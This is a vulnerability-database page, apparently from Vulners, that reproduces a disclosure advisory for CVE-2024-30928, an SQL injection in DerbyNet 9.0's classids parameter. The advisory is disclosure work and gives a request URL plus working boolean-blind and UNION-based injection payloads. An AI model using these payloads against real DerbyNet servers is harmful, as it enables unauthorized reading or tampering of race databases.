Vulners
Lucene search
DerbyNet 9.0 ajax/query.slide.next.inc SQL Injection
🗓️ 05 Apr 2024 00:00:00Reported by Valentin LobsteinType 
packetstorm🔗 packetstormsecurity.com👁 264 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2024-30928 | 6 Apr 202409:41 | – | circl |
 | DerbyNet 安全漏洞 | 18 Apr 202400:00 | – | cnnvd |
 | DerbyNet classids parameter SQL injection vulnerability | 22 Apr 202400:00 | – | cnvd |
 | CVE-2024-30928 | 18 Apr 202400:00 | – | cve |
 | CVE-2024-30928 | 18 Apr 202400:00 | – | cvelist |
 | CVE-2024-30928 | 18 Apr 202422:15 | – | nvd |
 | CVE-2024-30928 | 18 Apr 202422:15 | – | osv |
 | PT-2024-23678 · Derbynet · Derbynet | 5 Apr 202400:00 | – | ptsecurity |
 | CVE-2024-30928 | 23 May 202510:17 | – | redhatcve |
 | CVE-2024-30928 | 18 Apr 202400:00 | – | vulnrichment |
10
`CVE ID: CVE-2024-30928
Description:
An SQL Injection vulnerability has been discovered in DerbyNet version 9.0, particularly within the `ajax/query.slide.next.inc` file. This vulnerability allows remote attackers to execute arbitrary code and disclose sensitive information by exploiting the unvalidated `classids` parameter used in constructing SQL queries. This parameter is not properly sanitized before being included in the SQL statement, leading to a critical risk of SQL Injection.
Vulnerability Type: SQL Injection
Vendor of Product: DerbyNet - Available on GitHub: https://github.com/jeffpiazza/derbynet
Affected Product Code Base: DerbyNet - v9.0
Affected Component: ajax/query.slide.next.inc
Attack Type: Remote
Impacts:
- Code execution: True
- Information Disclosure: True
Attack Vectors:
The vulnerability is primarily exploited by manipulating the `classids` parameter in the user's request to the `ajax/query.slide.next.inc` file. The lack of adequate input validation allows attackers to inject malicious SQL code through this parameter. Example attack vectors include:
- Direct exploitation:
- `http://127.0.0.1:8000/action.php?query=slide.next&mode=racer&classids=1`
- Boolean-based blind SQL Injection:
- Payload: `query=slide.next&mode=racer&classids=1) AND 4365=4365 AND (6880=6880`
- UNION query SQL Injection:
- Payload: `query=slide.next&mode=racer&classids=-3890) UNION ALL SELECT NULL,NULL,CHAR(113,107,120,122,113)||CHAR(79,97,117,85,112,79,82,85,75,114,65,66,118,100,117,107,79,118,111,104,67,105,87,86,72,110,107,119,113,86,106,107,115,100,110,109,98,77,85,115)||CHAR(113,118,120,120,113),NULL,NULL,NULL,NULL,NULL-- rDzQ`
These vectors demonstrate how an attacker could manipulate SQL queries to potentially access or manipulate database information unauthorizedly.
Discoverer: Valentin Lobstein
References:
- Official website: http://derbynet.com
- Source code on GitHub: https://github.com/jeffpiazza/derbynet
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Apr 2024 00:00Current
7.4High risk
Vulners AI Score7.4
EPSS0.00233